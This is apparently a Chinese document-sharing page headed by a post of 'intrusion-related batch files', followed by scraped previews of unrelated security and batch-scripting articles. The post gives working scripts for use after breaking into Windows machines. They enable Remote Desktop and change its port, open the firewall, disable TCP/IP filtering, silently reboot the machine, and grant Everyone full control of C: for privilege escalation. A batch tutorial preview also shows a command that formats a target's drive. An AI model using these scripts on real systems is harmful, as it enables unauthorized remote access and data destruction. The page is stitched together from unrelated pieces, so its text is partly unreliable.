入侵的一些相关批处理
黑客入侵流程及相关技术

黑客入侵流程及相关技术(电子商务1班赵冲 2220113179)摘要:“黑客”一词是由英语Hacker音译出来的。
他们伴随着计算机和网络的发展而产生成长。
黑客技术经历了整个计算机历史,可以说自从有了计算机,有了系统就产生了黑客。
黑客技术虽伴随着计算机技术而生,却高于计算机技术,并且鞭策着计算机技术的发展。
黑客技术纷繁复杂,但其攻击流程却大致相同:踩点、扫描、查点、获取访问权、权限提升、窃取、掩盖踪迹、创建后门和拒绝服务攻击。
本文就着重介绍了这九个步骤以及各步运用的相关技术。
关键词:黑客入侵流程入侵技术入侵工具尽管黑客攻击系统的技能有高低之分,入侵系统手法多种多样,但他们对目标系统实施攻击的流程大致相同。
其攻击过程可归纳为以下9个步骤:踩点(foot printing)、扫描(scanning)、查点(enumeration)、获取访问权(gaining access)、权限提升(escalating privilige)、窃取(pilfering)、掩盖踪迹(covering track)、创建后门(creating back doors)和拒绝服务攻击(denial of services)。
如下图:图1 黑客攻击流程1.踩点“踩点”原意为策划一项盗窃活动的准备阶段。
举例来说,当盗贼决定抢劫一家银行时,他们不会大摇大摆地走进去直接要钱,而是狠下一番工夫来搜集这家银行的相关信息,包括武装押运车的路线及时间、摄像头的位置、逃跑出口等信息。
在黑客攻击领域,“踩点”是传统概念的电子化形式。
“踩点”的主要目的是获取目标的如下信息:因特网网络域名、网络地址分配、域名服务器、邮件交换主机和网关等关键系统的位置及软硬件信息;内联网和Internet内容类似,但主要关注内部网络的独立地址空间及名称空间;远程访问模拟/数字电话号码和VPN访问点;外联网与合作伙伴及子公司的网络的连接地址、连接类型及访问控制机制;开放资源未在前4类中列出的信息,例如Usenet、雇员配置文件等。
bat批处理命令大全

bat批处理命令大全.txt21春暖花会开!如果你曾经历过冬天,那么你就会有春色!如果你有着信念,那么春天一定会遥远;如果你正在付出,那么总有一天你会拥有花开满圆。
.bat 批处理命令关键词:批处理 ?? ????????????????????????????????????????一.简单批处理内部命令简介??1.Echo 命令??打开回显或关闭请求回显功能,或显示消息。
如果没有任何参数,echo 命令将显示当前回显设置。
??? 语法??echo [{on│off}] [message]??Sample:@echo off / echo hello world??在实际应用中我们会把这条命令和重定向符号(也称为管道符号,一般用> >> ^)结合来实现输入一些命令到特定格式的文件中.这将在以后的例子中体现出来。
??2.@ 命令??表示不显示@后面的命令,在入侵过程中(例如使用批处理来格式化敌人的硬盘)自然不能让对方看到你使用的命令啦。
??Sample:@echo off??@echo Now initializing the program,please wait a minite...??@format X: /q/u/autoset (format 这个命令是不可以使用/y这个参数的,可喜的是微软留了个autoset这个参数给我们,效果和/y是一样的。
)??3.Goto 命令??指定跳转到标签,找到标签后,程序将处理从下一行开始的命令。
??语法:goto label (label是参数,指定所要转向的批处理程序中的行。
)?? Sample:??if {%1}=={} goto noparms??if {%2}=={} goto noparms(如果这里的if、%1、%2就是表示变量。
)??@Rem check parameters if null show usage??:noparms??echo Usage: monitor.bat ServerIP PortNumber??goto end??? 标签的名字可以随便起,但是最好是有意义的字母啦,字母前加个:用来表示这个字母是标签,:开头的字符行, 在批处理中都被视作标号, 而直接忽略其后的所有内容, 只是为了与正常的标号相区别, 建议使用 goto 所无法识别的标号, 即在 :后紧跟一个非字母数字的一个特殊符号.goto命令就是根据这个:来寻找下一步跳到到那里。
网络安全常见漏洞入侵手段

网络安全常见漏洞入侵手段在当今数字化的时代,网络安全已经成为了至关重要的问题。
随着互联网的普及和信息技术的飞速发展,各种网络漏洞层出不穷,给个人、企业甚至国家带来了严重的威胁。
了解网络安全常见的漏洞入侵手段,对于我们提高网络安全意识、加强防护措施具有重要意义。
一、SQL 注入攻击SQL 注入是一种常见且危害极大的漏洞入侵手段。
它利用了网站应用程序对用户输入数据的不当处理,将恶意的 SQL 代码注入到数据库查询中,从而获取、修改或删除数据库中的敏感信息。
例如,当一个网站的登录页面要求用户输入用户名和密码时,如果该网站没有对用户输入的内容进行充分的验证和过滤,攻击者就可以在用户名或密码字段中输入一些特定的 SQL 语句。
比如输入“'OR1=1 ”作为用户名,可能会绕过正常的登录验证,直接登录到系统中。
为了防范 SQL 注入攻击,网站开发者应该对用户输入的数据进行严格的验证和过滤,避免将不可信的数据直接拼接到 SQL 语句中。
同时,使用参数化查询等技术也可以有效地防止 SQL 注入。
二、跨站脚本攻击(XSS)跨站脚本攻击是指攻击者通过在目标网站上注入恶意脚本代码,当其他用户访问该网站时,恶意脚本就会在用户的浏览器中执行,从而窃取用户的敏感信息,如 Cookie、会话令牌等,或者进行其他恶意操作。
有两种主要类型的 XSS 攻击:存储型 XSS 和反射型 XSS。
存储型XSS 是指攻击者将恶意脚本存储在目标网站的数据库中,例如在论坛的帖子、评论等地方;反射型 XSS 则是通过将恶意脚本包含在 URL 中,诱使用户点击从而触发攻击。
为了防范 XSS 攻击,网站开发者需要对用户输入的内容进行严格的消毒处理,将可能的恶意脚本代码进行过滤或转义。
同时,设置合适的 HTTP 响应头,如“ContentSecurityPolicy”,也可以增强对 XSS 攻击的防护能力。
三、跨站请求伪造(CSRF)跨站请求伪造是一种利用用户在已登录网站的信任关系,诱使用户在不知情的情况下执行恶意操作的攻击手段。
服务器入侵现场处置方案

服务器入侵现场处置方案随着互联网的普及,企业在网络化办公中逐渐抛弃传统方式,使用服务器来存储和处理数据,因此服务器已经成为企业内部资产中不可或缺的组成部分。
然而,随着网络技术的不断发展,黑客攻击也日益增多,意外的入侵事件时有发生,对于企业来说无异于重大的打击,尤其是在潜在的机密数据遭到抓取、破坏或篡改的情况下。
在面对这些安全问题时,我们需要制定一些详细而有效的服务器入侵现场处置方案,以便在事件发生时能够迅速、正确地做出反应。
预防措施首先,准备工作非常重要。
在实际生产环境中,保障服务器系统的安全与稳定应该是第一位的工作。
可以采用以下预防措施:1.安装和维护防火墙以保护服务器不受攻击2.确保服务器的软件和固件都及时更新到最新版本3.定期备份服务器数据以避免数据丢失4.建立强密码策略,对系统管理员和普通用户进行分级管理和权限控制5.限制服务器物理访问权限以保护硬件安全6.配置入侵检测系统以识别并预防未经授权的访问故障恢复计划服务器入侵可能会导致业务中断,影响企业运营,因此必须建立故障恢复计划。
故障恢复计划涉及以下步骤:步骤1:发现入侵事件•监视系统日志,确保入侵事件能够及时被识别•配置入侵检测系统以识别无效和危险的请求•确保在发现入侵事件后,找到并立即隔离入侵源步骤2:收集信息和证据在进行恢复前,必须收集足够的信息和证据,以支持后面的调查和诊断。
•收集所有联网设备的日志和行为•记录攻击者的IP地址,攻击时间和类型•收集涉及到入侵事件的任何文件步骤3:恢复系统功能•确认被入侵的服务器已被隔离•对受影响的系统进行全面扫描,以确保所有的恶意软件或病毒都被清除•恢复被攻击的系统和服务•恢复业务及数据流程,确保业务能够正常运行步骤4:改善和提高安全性•对所有联网应用进行全面审查,以发现潜在的安全漏洞•在服务器系统上增强安全策略•安装入侵检测系统或 IDS,并定期进行演习调查和报告最后,还需要对事件进行调查和报告。
批处理文件

批处理文件批处理,顾名思义就是进行批量的处理。
批处理文件是扩展名为·bat 或·cmd的文本文件,包含一条或多条命令,由DOS或Windows系统内嵌的命令解释器来解释运行。
店铺给大家分享一下批处理文件怎么设置的方法。
希望大家喜欢!批处理文件参考如下:批处理文件是一种简单的可执行文件,常常用来执行清理或简单的安装命令,下面我们来看一个练习;1、批处理文件1)批处理文件的图标是一个齿轮窗口图标,双击运行后会出来一个黑色命令行窗口;2)在批处理文件图标上点右键,里面有一个“编辑”命令,可以查看文件的内容;2、批处理命令1)echo 是显示命令,它后面的文字会原样显示在命令行窗口里,前面加上“@”则会隐藏,比如: echo 正在完成,请稍等...2)del 是删除命令,可以删除指定的文件,星号“*”代表所有文件,比如: echo del *.tmp3)rd 是删除文件夹命令,可以删除指定文件夹;(更多电脑知识,计算机基础知识入门,请到电脑知识网)4)pause 暂停命令,这时候按按一下回车键或空格键就可以继续;5)可以用记事本来创建批处理文件,每行输入一句命令,保存的时候以.bat为文件名,类型选所有文件;;一、基础语法:1.批处理文件是一个“.bat”结尾的文本文件,这个文件的每一行都是一条DOS命令。
可以使用任何文本文件编辑工具创建和修改。
2.批处理是一种简单的程序,可以用 if 和 goto 来控制流程,也可以使用 for 循环。
3.批处理的编程能力远不如C语言等编程语言,也十分不规范。
4.每个编写好的批处理文件都相当于一个DOS的外部命令,把它所在的目录放到DOS搜索路径(path)中,即可在任意位置运行。
5.C:\AUTOEXEC.BAT 是每次系统启动时都会自动运行的,可以将每次启动时都要运行的命令放入该文件中。
6.大小写不敏感(命令符忽略大小写)7.批处理的文件扩展名为 .bat 或 .cmd。
网络入侵事件的应急预案从检测到响应

网络入侵事件的应急预案从检测到响应网络入侵事件对于现代社会已经成为一个持续的威胁。
黑客们不断改进其攻击技术,通过入侵他人的系统来窃取敏感信息、破坏网络安全,给个人和组织造成巨大损失。
为了规避这种风险,建立一个完善的网络入侵事件的应急预案变得至关重要。
本文将从检测到响应的过程来论述网络入侵事件的应急预案。
一、入侵事件检测入侵事件检测是应急预案的第一步。
通过有效的入侵检测手段,可以在入侵行为发生后尽快发现并采取相应应对措施。
以下是几种常见的入侵检测方式:1. 网络流量分析网络流量分析是通过监控和分析网络中的数据流量来发现异常行为的一种方法。
通过分析流量模式和使用规律,可以及时发现和识别不正常的网络活动,并进行进一步调查和处理。
2. 入侵检测系统(IDS)入侵检测系统是一种主动式的监控系统,用于识别和报告入侵事件。
它可以分为网络入侵检测系统(NIDS)和主机入侵检测系统(HIDS)。
NIDS监控网络流量,而HIDS监控主机内部的活动。
通过这些系统,可以检测到潜在的入侵行为,以便及时采取措施。
3. 安全日志分析安全日志是记录系统和网络活动的重要组成部分。
对安全日志进行实时监控和分析,可以帮助发现潜在的入侵行为。
通过对日志中的异常事件进行跟踪和调查,可以及时采取预防和应对措施。
二、入侵事件响应入侵事件检测之后,紧接着是应对入侵事件。
早期的检测能够帮助尽早发现入侵行为,但如果没有及时响应,入侵者的破坏行为可能会继续扩大。
以下是入侵事件响应的几个阶段:1. 确认入侵在收到入侵警报后,首先要确认是否真的发生了入侵。
通过对异常行为的进一步调查和分析,确保警报是有效的,而不是误报。
2. 隔离受感染系统一旦确认发生入侵,重要的是立即隔离受感染的系统,以防止病毒、恶意软件或黑客进一步扩散或破坏。
隔离可以包括断开受感染系统的网络连接或者关闭一些关键服务。
3. 收集证据在入侵事件发生后,收集和保存相关的证据非常重要。
这些证据可以作为后续调查和追责的重要依据。
入侵排查项目案例范文
入侵排查项目案例范文标题:某公司网络入侵排查项目案例报告摘要:本报告基于某公司网络入侵排查项目,在某公司的网络系统发生异常现象后,为确保安全性、保护客户信息,特派技术团队进行了一系列入侵排查工作。
本报告将详细介绍排查过程、发现的问题、解决方案以及对公司安全体系的建议。
一、项目背景某公司是一家在线金融服务提供商,提供互联网用户金融服务及支付等服务。
为了确保用户数据和交易的安全,公司建立了相对完善的网络安全体系。
但近期公司网络系统出现了一系列异常现象,包括数据泄露、系统崩溃、网络瘫痪等问题,为此公司决定开展一次入侵排查项目,以排查是否存在网络入侵行为。
二、项目目标本次入侵排查项目的目标如下:1.确认是否存在网络入侵行为,找出入侵路径和攻击手段。
2.分析入侵者获取的信息及可能对公司带来的影响程度。
3.提供解决方案和预防措施,加强公司网络安全体系。
4.对公司员工进行网络安全教育,提高安全意识和应对能力。
三、项目工作与结果1.收集信息与初步分析通过与公司技术部门协调,我们获取了相关的日志文件、服务器配置以及设备信息。
对于异常事件进行了初步分析,甄别出多个可能存在入侵行为的节点。
2.可疑节点排查根据初步分析的结果,我们对可疑节点进行了详细的排查和追踪。
经过多个周期的追踪,我们发现了一批IP地址和域名与恶意软件相关联,并对其进行了阻断和隔离。
3.安全漏洞评估我们对公司的网络系统进行了全面的安全漏洞评估,包括扫描网络设备、操作系统、数据库等。
发现了多个潜在的漏洞问题,其中包括未及时修补的软件漏洞、管理口令弱等情况。
4.清除恶意软件通过对受感染的设备进行彻底清理,采用专业的杀毒软件对系统进行全盘扫描,并更新最新的病毒库。
保证了系统内的恶意软件得到清理,恶意程序停止运行。
5.数据恢复与保护对可能遭受破坏或篡改的数据进行恢复,并进行了相应的加密和备份措施,确保数据的安全性和可靠性。
6.提升安全意识和能力针对入侵事件的原因和防范措施,我们向公司的所有员工进行了网络安全教育培训,提高员工的安全意识和网络安全知识,并演练了常见的网络攻击手法和防范措施。
批处理命令教程之网络入侵
批处理文件教程之网络入侵批处理文件是无格式的文本文件,它包含一条或多条命令。
它的文件扩展名为 .bat 或 .cmd。
在命令提示下键入批处理文件的名称,或者双击该批处理文件,系统就会调用Cmd.exe按照该文件中各个命令出现的顺序来逐个运行它们。
使用批处理文件(也被称为批处理程序或脚本),可以简化日常或重复性任务。
当然我们的这个版本的主要内容是介绍批处理在入侵中一些实际运用,例如我们后面要提到的用批处理文件来给系统打补丁、批量植入后门程序等。
一.简单批处理内部命令简介1.Echo 命令打开回显或关闭请求回显功能,或显示消息。
如果没有任何参数,echo 命令将显示当前回显设置。
语法echo [{on|off}] [message]Sample:@echo off / echo hello world在实际应用中我们会把这条命令和重定向符号(也称为管道符号,一般用> >> ^)结合来实现输入一些命令到特定格式的文件中.这将在以后的例子中体现出来。
2.@ 命令表示不显示@后面的命令,在入侵过程中(例如使用批处理来格式化敌人的硬盘)自然不能让对方看到你使用的命令啦。
Sample:@echo off@echo Now initializing the program,please wait a minite...@format X: /q/u/autoset (format 这个命令是不可以使用/y这个参数的,可喜的是微软留了个autoset这个参数给我们,效果和/y是一样的。
)3.Goto 命令指定跳转到标签,找到标签后,程序将处理从下一行开始的命令。
语法:goto label (label是参数,指定所要转向的批处理程序中的行。
) Sample:if {%1}=={} goto noparmsif {%2}=={} goto noparms(如果这里的if、%1、%2你不明白的话,先跳过去,后面会有详细的解释。
电脑病毒木马入侵的方式有哪些
电脑病毒木马入侵的方式有哪些病毒木马入侵的方式有些想都想都想不到,不用心是很难发现的,那么电脑病毒木马入侵的方式有哪些呢?下面由店铺给你做出详细的电脑病毒木马入侵的方式介绍!希望对你有帮助!电脑病毒木马入侵的方式介绍:入侵方式一、修改批处理很古老的方法,但仍有人使用。
一般通过修改下列三个文件来作案:Autoexec.bat(自动批处理,在引导系统时执行)Winstart.bat(在启动GUI图形界面环境时执行)Dosstart.bat(在进入MS-DOS方式时执行)例如:编辑C:\\windows\\Dosstart.bat,加入:start Notepad,当你进入“MS-DOS方式”时,就可以看到记事本被启动了。
入侵方式二、修改系统配置常使用的方法,通过修改系统配置文件System.ini、Win.ini来达到自动运行的目的,涉及范围有:在Win.ini文件中:[windows]load=程序名run=程序名在System.ini文件中:[boot]shell=Explorer.exe其中修改System.ini中Shell值的情况要多一些,病毒木马通过修改这里使自己成为Shell,然后加载Explorer.exe,从而达到控制用户电脑的目的。
入侵方式三、借助自动运行功能这是黑客最新研发成果,之前该方法不过被发烧的朋友用来修改硬盘的图标而已,如今它被赋予了新的意义,黑客甚至声称这是Windows的新BUG。
Windows的自动运行功能确实很烂,早年许多朋友因为自动运行的光盘中带有CIH病毒而中招,现在不少软件可以方便地禁止光盘的自动运行,但硬盘呢?其实硬盘也支持自动运行,你可尝试在D盘根目录下新建一个Autorun.inf,用记事本打开它,输入如下内容:[autorun]open=Notepad.exe保存后进入“我的电脑”,按F5键刷新一下,然后双击D盘盘符,怎么样?记事本打开了,而D盘却没有打开。
网络入侵后的痕迹提取分析
网络入侵后的痕迹提取分析魏渊【摘要】网络攻击和入侵事件造成的影响和危害需要电信运营商引起足够重视和采取应对措施.在被黑客入侵后仅仅进行数据恢复、安全加固尚不足以规避风险,这种做法过于被动.通过对痕迹的提取分析了解入侵的过程和操作行为,能够彻底清除后患,同时获得证据线索和溯源.入侵痕迹提取分析的重要原则包括及时性、准确性、合法性、多备份、环境安全、严格管理过程.主要从网络层面提取入侵痕迹和从主机层面提取入侵痕迹.在进行痕迹提取分析的时候,不推荐在运行系统中直接查看各项痕迹,而应将所有的痕迹数据全部而迅速地提取出来进行备份,辅以截屏保留证据,对备份件进行分析.在工具的选择上,推荐使用命令行工具.【期刊名称】《江苏通信》【年(卷),期】2014(030)005【总页数】2页(P67-68)【关键词】网络入侵;痕迹提取;痕迹分析;系统加固【作者】魏渊【作者单位】中国电信股份有限公司江苏分公司操作维护中心【正文语种】中文网络入侵是指在非授权的情况下,试图登录、处理、控制或破坏网络信息系统的故意行为。
在入侵过程中进行的某些操作行为,在入侵结束后会保留在系统中或者保持一段时间,而这些遗留的操作行为即是判定异常行为构成入侵的证据或线索,在本文中称之为入侵痕迹。
在网络被入侵后,通常网络管理员想到的是对网络进行应急响应、数据恢复、漏洞修复以及安全加固等。
这些应对措施固然正确,却不足以规避风险,还应对网络系统入侵痕迹进行提取分析。
入侵痕迹提取分析通过技术手段尽可能准确、及时地提取入侵痕迹,对其进行深度剖析,以还原入侵的过程和操作行为,逆向操作使系统恢复到正常状态并对薄弱点进行加固,能够彻底清除后患、规避日后风险,同时获得证据线索和溯源,进而保留对入侵者依法追究责任的权利。
入侵痕迹提取分析的重要原则包括及时性、准确性、合法性、多备份、环境安全、严格管理过程。
在入侵过程中或之后,系统中必然存在很多入侵痕迹,但随着时间的流逝,一方面可能由于入侵者自行删除了某些入侵痕迹,如安全日志等,另一方面由于系统的运行需要不断进行数据读写等,导致很多入侵痕迹被覆盖或修改,因此提取入侵痕迹需要遵循的第一原则是及时性。
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
入侵的一些相关批处理发布日期:2010/9/23 1:59:00Win XP&Win 2003开3389代码:echo windows Registry Editor Version 5.00 >3389.regecho. >>3389.regecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>3389.regecho "fDenyTSConnections"=dword:00000000 >>3389.regecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>3389.regecho "PortNumber"=dword:00000d3d >>3389.regecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>3389.regecho "PortNumber"=dword:00000d3d >>3389.regWin2000开3389:echo windows Registry Editor Version 5.00 >2000.regecho. >>2000.regecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\windows\CurrentVersion\netcache] >>2000.regecho "Enabled"="0" >>2000.regecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\windows NT\CurrentVersion\Winlogon] >>2000.regecho "ShutdownWithoutLogon"="0" >>2000.regecho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\windows\Installer] >>2000.regecho "EnableAdminTSRemote"=dword:00000001 >>2000.regecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.regecho "TSEnabled"=dword:00000001 >>2000.regecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.regecho "Start"=dword:00000002 >>2000.regecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.regecho "Start"=dword:00000002 >>2000.regecho [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.regecho "Hotkey"="1" >>2000.regecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.regecho "PortNumber"=dword:00000D3D >>2000.regecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\WinStations\RDP-Tcp] >>2000.regecho "PortNumber"=dword:00000D3D >>2000.reg服务器重启代码:@ECHO OFF & cd/d %temp% & echo [version] > restart.inf(set inf=InstallHinfSection DefaultInstall)echo signature=$chicago$ >> restart.infecho [defaultinstall] >> restart.infrundll32 setupapi,%inf% 1 %temp%\restart.inf一些ghostxp无法连接3389的解决方法:windows Registry Editor Version 5.00[HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Enum\\Root\\RDPDR\\0000]"ClassGUID"="{4D36E97D-E325-11CE-BFC1-08002BE10318}""Class"="System""HardwareID"=hex(7):52,00,4f,00,4f,00,54,00,5c,00,52,00,44,00,50,00,44 ,00,52,\\00,00,00,00,00"Driver"="{4D36E97D-E325-11CE-BFC1-08002BE10318}\\\\0030""Mfg"="(标准系统设备)""Service"="rdpdr""DeviceDesc"="终端服务器设备重定向器""ConfigFlags"=dword:00000000"Capabilities"=dword:00000000这个注册表文件开始是没权限导入的。
要结合regini命令加上控制权限才行咯。
自己手动图形界面也行。
devcon -r install %windir%\inf\machine.inf root\rdpdrdecon是xp自带的终端服务器设备重定器(有的系统有有的没)还有个开3389的VBS版本也发给大家看看吧。
on error resume nextconst HKEY_LOCAL_MACHINE = &H80000002strComputer = "."Set StdOut = WScript.StdOutSet oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\"&_strComputer & "\root\default:StdRegProv")strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server" oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPathstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPathstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server" strValueName = "fDenyTSConnections"dwValue = 0oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"strValueName = "PortNumber"dwValue = 3389oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"strValueName = "PortNumber"dwValue = 3389oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue关闭TCP/IP端口筛选 (需重启)REG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\St andardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabled:@xpsp2res.dll,-22009 /f更改终端端口为3800(0x0ED8)REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x0ED8 /fREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x0ED8 /f入侵/提权:cacls.exe c: /e /t /g everyone:F (设置everyone对c盘拥有所有权限)还有个关于regini的使用的bat作用是增加注册表sam下的控制权限。